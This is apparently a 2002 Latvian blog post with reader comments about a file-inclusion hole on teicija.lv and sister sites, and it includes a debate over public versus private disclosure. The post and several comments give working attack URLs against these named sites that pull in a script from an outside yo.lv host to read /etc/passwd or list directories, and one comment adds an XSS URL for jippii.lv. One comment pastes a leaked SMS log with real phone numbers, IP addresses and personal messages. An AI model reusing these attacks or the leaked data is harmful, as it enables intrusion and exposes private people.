www.teicija.lv, www.plosti.lv un www.fligelis.lv skini?

Juris raksta:
listee paraadiijaas adresiite no Roze :

http://www.teicija.lv/index.php3?/etc/passwd

uzcepu scriptinju uz Yo.lv servaka :

mazs browseriits 🙂
http://www.teicija.lv/index.php3?http://maitasputns.yo.lv…

Rezultāta tas izskatās šādi teicija.lv.
No sevis pievienošu vēl vienu bildi jeb Poda jauno apvalku Pods Hot. Manuprāt skaisti. Var arī citus pamēģināt http://www.teicija.lv/index.php3?https://pods.lv, http://www.plosti.lv/index.php3?https://pods.lv un http://www.fligelis.lv/index.php3?https://pods.lv.

Ja nemaldos, tad tas viss saucas Cross Site Scripting, kad vienā lapā var iekļaut skriptus no citas lapas…

Bet pats sliktākais šajā visā pasākumā ir tas, ka paši autori ir izstrādājuši šīs lapas balstoties uz Cross Site Scripting principa, jo saites tiek liktas šādā līkā veidā. Ilustrācijai *parasta* saite pirmajā lapā. Tā kā, draugi mīļie, te nav nekādas hakošanas vai krakošanas, ja reiz autori paši tādas lietas taisa. Tie ir vienkārši apvalki jeb skini jūsu lapām 🙂

Cross-site scripting saites

39 thoughts on “www.teicija.lv, www.plosti.lv un www.fligelis.lv skini?

  1. def

    jaaa, par SMS es ar pasmejos… bet uztaisiju labaaku scriptinju : URL jaraxta ir nevis test.inc, a test1.inc
    smuki uztaisa koku ar URLiem…

    Atbildēt
  2. def

    vinjsh nevar neko nogriezt … jo buus jaapartaisa visi taa saucaamie “portaali” 🙂
    PS: http://www.teicija.lv/index.php3?http://maitasputns.yo.lv/test1.inc?yo =/home

    Atbildēt
  3. Teicejs

    Nu tagad var:
    http://www.teicija.lv /index.php3?sm.txt
    Ja kaadam neiet tad rezultaats ir:

    27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;371bdfbs ;saefdsafd 27/12/2002 ;195.13.254.67 ;195.13.254.67 ;371hgf ;hfghf 27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;3717393939 ;tagad visi var redzet shito sms, kuru es suutu! zajebis 27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;3719765297 ;shis ir tests 26/12/2002 ;80.232.164.114 ;80.232.164.114 ;3716397311 ;mīlu 26/12/2002 ;81.198.17.35 ;81.198.17.35 ;3716594820 ;ghhhhhhghghghghghghgh 26/12/2002 ;217.198.224.134 ;cm134.btv.lv ;3719658785 ;Kā ar veselibu? 24/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716491175 ;Gundega, ja vari tad atzvani par to pasaakumu 23/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716528599 ;chau kaa iet , te ugis , vai tev Inci ir kaada kapeika? 23/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719484729 ;Aigar, vai tu essi Madonaa, un vai tevi var riit satikt riita pusee. Ugis 20/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716479827 ;Labs vakars no teicijas. Juus esat internetaa, apsveicu! Ugis – Teicija 20/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719479139 ;Te no Teicijas Ugis. Atsuuti luudzu uz teicija@teicija.lv visu par sacensiibaam 19/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;kur kavejaties, gaidam maija 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Uzrakstīju visus gadus,varbūt noder.Ja sanjeemi,uzpīkstini.Veiksmi!Inese 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Gailis-21,33,45,57,69,81,93.Suns-22,34,46,58,70,82,94.Cūka-23,35,47,5 9,71,83,95. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Zirgs-30,42,54,66,78,90.Kaza-31,43,55,67,79,91.Peertikjis-20,32,44,56 ,68,80,92. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Kakjis-27,39,51,63,75,87.Pūkjis-28,40,52,64,76,88.Cjūska-29,41,53,65, 77,89. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Zurka-1924.,36,48,60,72,84.Veersis-25,37,49,61,73,85.Tīgjeris-26,38,5 0,62,74,86. 17/12/2002 ;159.148.11.2 ;maxim.mauer.lv ;3719758155 ;jjkljkljkljkkjkjlj 17/12/2002 ;213.175.87.184 ;213.175.87.184 ;3716201418 ;atsaucies! indra 16/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;kana 12/12/2002 ;194.19.253.25 ;194.19.253.25 ;3716519674 ;test 11/12/2002 ;159.148.235.100 ;proxy.ru.lv ;3716363694 ;Kaa iet shai tumshajaa dienaa? Vai sanjeemi manu sms no Interneta? Uzpiikstini! Miilu! 11/12/2002 ;195.244.155.162 ;195.244.155.162 ;3719465695 ;Sveiciens no Madonas! 10/12/2002 ;194.19.231.226 ;teledialogs-cc0.telia.lv ;3719438078 ;cau teeti iedod luudzu naudu pusdienaam 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Hey-hey-hey!A, es tulit jau ielas do$os!Sejaa smaids un soli$i raiti!:)Lai tev jaux vakars un $o to ari pamacies! Ataaa! 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719771673 ;Cau,Rasma!Ka labi arhivaa dzelas?Neesi jau ierakusies lielajos puteklos?:)Nu tad 4dien 17.15 pie katedrales!Smaidinu!Rim 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719847011 ;Hello, Ninna!:)Kur tu esi pazudusi un kura pasaules mala atrodies?Kapec nedod par sevi nekadu zinu?Jauku vakaru!:) Husta 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Ha-haa!Nu tu mani uzjautrinaji! 3.STAVAA?!?Tev “veicaas”!:) Vai tik` tavs draugs nebus gajis pa kadiem neceliem?!:) Ataa 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3716558365 ;Nu, kas te tie par tadiem datora IP! Smaidinu! 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Cau, milais!Cik noprotu nevienu sms neesi sanemis!:( Galvenais jautajums bija:”Ka ar locitavam un du$u?”:) Jauku dienu!L 09/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;ccau 09/12/2002 ;159.148.59.61 ;159.148.59.61 ;3716553405 ;chau! 09/12/2002 ;80.232.164.99 ;80.232.164.99 ;3716334719 ;Cau,atpuutniece!Kaadu jauku briinumu shonedeel!Bija jauki Saules ielaa atkal.Tev taisniiba bija.Ineta 09/12/2002 ;80.232.164.99 ;80.232.164.99 ;3716782459 ;Cau,atpuutniece!Kaadu jauku briinumu shonedeel!Bija jauki Saules ielaa atkal.Tev taisniiba bija.Ineta 08/12/2002 ;80.232.211.228 ;80.232.211.228 ;3719484729 ;jkabds 08/12/2002 ;195.2.124.246 ;195.2.124.246 ;371 ; 08/12/2002 ;80.232.211.228 ;80.232.211.228 ;3719484729 ;Sveicinaats aigar raksti mani shaadi analog drusku saiisinaaju analog un ieved sarakstu isalonaa.. 07/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;Sveiks , Pedro 07/12/2002 ;213.190.135.241 ;213.190.135.241 ;3719794271 ;Es te tik meiginju suutit zinju . Ilona Ja sanaaks zvaniishu pec 50min 07/12/2002 ;195.216.187.20 ;195.216.187.20 ;3716446027 ;Chau!Pabaro manu ziloniiti!!!Luuuudzu!!! 07/12/2002 ;80.232.181.68 ;80.232.181.68 ;3719692315 ;Cau atzvani ja esi maajaas archijss vai brauksi uz cesvaini? 06/12/2002 ;62.85.48.141 ;62.85.48.141 ;3719294113 ;Kas būs?Ko saņemšu/ēeeīiiūuu 06/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716406309 ;Sveika,zinjas sanjeemu,paldies.Zalves Jurim tiks pa bikseem.Par Cesvaini esmu shokaa. 06/12/2002 ;213.175.87.184 ;213.175.87.184 ;3719692315 ;aizraksti uz lielajiem delfi un apollo par akciju 06/12/2002 ;213.182.193.101 ;mpe3-101.mpe.lv ;371 ; 06/12/2002 ;19

    Atbildēt
  4. def

    nav nekas pieverts, piekljuve caur jebkuru portalu 🙂
    PS: http://www.kapa.lv/jaunumi/kapa.php3?http://maitasputns.yo.lv/test1.in c?yo=/home

    Atbildēt
  5. Andris

    Turklat tas ir LatNet serveris… rausis.latnet.lv… un piekluut tiesham var no jebkura cita portala… piemeram http://www.plosti.lv/index.php3?http://maitasputns.yo.lv/test1.inc?yo= /etc/passwd

    Atbildēt
  6. hQuse

    mana pieeja shajaa situaacijaa kaa shiis informaacijas pamatavotam ir taada, ka nevajadzeetu njirgaaties par cilveekiem, bet gan paliidzeet jebkaadaa veidaa.

    Atbildēt
  7. ezis2a

    nu tak tieshaam jautri…
    ne jau tas liikais php, bet tas ka rausis valjaa!
    visi latnet klienti, johaidii. mysql passwordi..
    njemam phpmyadmin, un.. truba:)
    Re ko noziimee ‘shared hosting’, exploito vienu, un…
    tjipa “1 za vseh i vse za odnogo”, ka bij padomju laikaa
    nu man arii tur viens tautaa diezgan populaars satinjsh, ko es ‘tehniski pieskatu’, nesen paarlika uz latnetu no mediaparka. to labaak neaiztieciet.

    Atbildēt
  8. def

    neviens nenjirgaajaas… lai taisa jau to include…
    bet ne jau shaadaa veidaa : incluudo kas noraadiits (labi ja html incluudo, bet arii php paarsee).
    galvenais ir taadi vairaaki portali kas uz taa griezhaas (tai pashaa serveriitii)… nu tas pa traku.
    PS: pirms lapu raadiit tautai, taa jaanocheko uz bugiem un t.t… bet bugi ir vienmer :_)

    Atbildēt
  9. Kaklz

    nu jau gan aizraavaaties ..
    shitais gljuks jau bija zinaams briidii, kad nodega Cesvaines pils, vismaz man .. atshkjiriibaa no dazha laba, es uzreiz neskreeju uz podu un nebljaavu, ka redz, esmu KEWL haXorZ, ka reku luku viens ir dumaaks par mani .. bet pabriidinaaju autoru .. tas, ka vinsh kljuudas neizlaboja jau ir vinja probleema ..
    vaidzeetu aizdomaaties arii kaadreiz par to, kaadas jums buutu izjuutas shaados gadiijumos ..
    sorry, ja baigi pareizi, ir tachu Z-Sveetki .. jaabuut labiem, miiljiem .. a juus te 🙁 .. 😀 😀 😀

    Atbildēt
  10. JaffaMan

    Šajā gadījumā nav te nekāds cross site scripting (XSS), bet gan vienkārši nepareiza konfigurācija un kods. XSS rodas situācijās, kad skripts tiek injicēts lapā izmantojot, piemēram, meklēšanas servisu. Piemēru var skatīt kaut vai Jippii.lv lapā:
    http://www.jippii.lv/lv/gsm/search/logo/?query=%3Cscript%3Eal ert%28%22XSS%22%29%3C%2Fscript%3E

    Atbildēt
  11. edc

    Un kapec tadas lietas ir jaapadara publiskas? Vai kāds ir briidiaajis adminus? Manupraat blaustiities pa pasauli par sitaadiem glukiem var taadaa gadiijuma, ja ir ZERO reakcija no resursa uztureetaajiem.

    Atbildēt
  12. Kaklz

    Pow: es te nepretendeeju uz kaut kaadu tevis piedeeveeto titulu, tachu man liekas mazliet stulbas shitaas izdariibas, kad vesels bars cilveecinju priecaajas un bljauj un stulbi izreec kaada cita cilveeka nezinaashanu ..
    ja nu kas, tad iemetam arii pirmo response no autora peec kljuudas pazinjoshanas:
    “5.Dec.2002:
    Ingus liels paldies par pamaaciibu, iisteniibaa es zinaaju, ka ir lietas kas
    ir neizbeegamas laikautko labotui, Teicijas portaala sisteemu es izdomaaju
    pats kaa azartisks interneta apgiuveejs, man nav spec izgliitiibas un es
    visu esmu apguvis kaa autodidakts un esmu tipisks ssi liimenja paarstaavis,
    es kljuudu esmu sapratis un daljeeji jau par to zinaaju, rtaccu juutu, ka
    strauji taa teicija attistaas
    Probleema ir taada ka nav taa laika saviest kaartiibu.. ”
    taa luuk .. 😉

    Atbildēt
  13. PoRToSS

    Es nezinu, vai shim krutajam hackerim ir lieli mazveertiibas kompleski vai kas… Blj, buutu delfi.lv uzlauzushi tad vareetu priecaaties, bet nee, panjem kaadu nezinaamu, nekomerciaalu lapu. “Uzlauzh”, bljaustaas pa visu netu un juutas kruti. Un pods tishaam ir pods, ja jau shitaadus meeslus nav kauns publiceet.

    Atbildēt
  14. def

    to portoss: neviens jau nenijrgaajaas… ir jau OK lapa bet besii aaraa, ka taisa dahuja portaalu uz taadas engines (nepaarbaudiitas)… “pospeshish, ljudej nasmeshish”.. vo.
    un neviens jau nebljaustaas – zinaaja tikai Delfi liste un
    pods.lv ( man liekas pods.lv arii tam domaats, jo [varbut arii enpamaniiji??] augshaa ir taa saucaamaa sadalja “hack”)

    Atbildēt
  15. Roze

    Taa kaa ir baiss slinkums u.c. sveetku izrietoshas lietas, tad parposteeju savu mailu no weblistes:
    > Vispaar jau skumji paveerot, kaada ir latvijas webistu kultuura.
    Nu principaa kaa jau dazhi cilveeki teica taa iespeejams nav tikai webistu bet gan latvieshu mentalitaate pashaa pamataa.. 🙂
    > Vai jums neliekas, ka atrodot kaadu caurumu vislabaak buutu par to
    > privaati uzmailot lapas adminam, nevis ziimeeties ar to cik kruts
    > “HackerZ” nu katrs ir, un izlasiijushi listee par caurumu nu maitaa
    > ko var samaitaat.
    Uz sho lietu var skatiities dazhaadi: protams ir slikti ja cilveeks kaut ko shaadu atrodot/pamanot peekshnji iedomaajas ka ir sasniedzis “hakereeshanas” kalngalus un kljuvis par uberguru.. Bet no otras puses, shaadi piemeeri kaut vai for fun (kaa manupraat bija arii shajaa reizee) kaut arii saapiigi, ljauj maaciities gan pashas lapas autoriem gan arii citiem kas sho listi lasa, lai peecaak nekljuutu par kaut kaadu braziilju script kiddies defeisa upuriem 🙂
    No vienas puses itkaa jau bojaajas reputaacija, bet no otras puses kaadreiz neapzinaati vai nezinaashanas deelj kljuudaas visi un bugi ir neizbeegama lieta, taa arii pieraadot darba deveejiem (web/it kompanijaam) un pakalpojumu izmantotaajiem ka “uzcept” funkcionaalu un reizee droshu produktu nemaz nav tik vienkaarshi, liidz ar to par to var prasiiit krietnu samaksu.
    > Ja uz ielas redzeesiet neaizsleegtu auto, vai tas arii buus iemesls,
    > lai zagtu magji, ar domu, ja jau iipashnieks taads cirvis, ka nerubii
    > aizsleegt auto, nu tad taa vinjam arii vajag.
    Shajaa gadijumaa izraut magji un iemest vinju bagazhniekaa 😉 Naakoshajaam reizeem..
    p.s. zsveetku vecha maisaa reidzeem meedz buut arii zhagari
    ljur ljur taalaak …

    Atbildēt
  16. ManInBlack

    Hmz.. kads varetu pameginat uzlauzt manu saitu.. Vai ari www.mvm.lv. Hosts viens un tas pac. Es nelaunosos, backups man ir, tikai gribas zinat, vai neesmu kaut kur kadu caurumu atstajis. Es kaa nekaa Linuxu tikko tik saku apgut un php tapat…

    Atbildēt

Atbildēt uz komentāru edc Atcelt atbildi

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *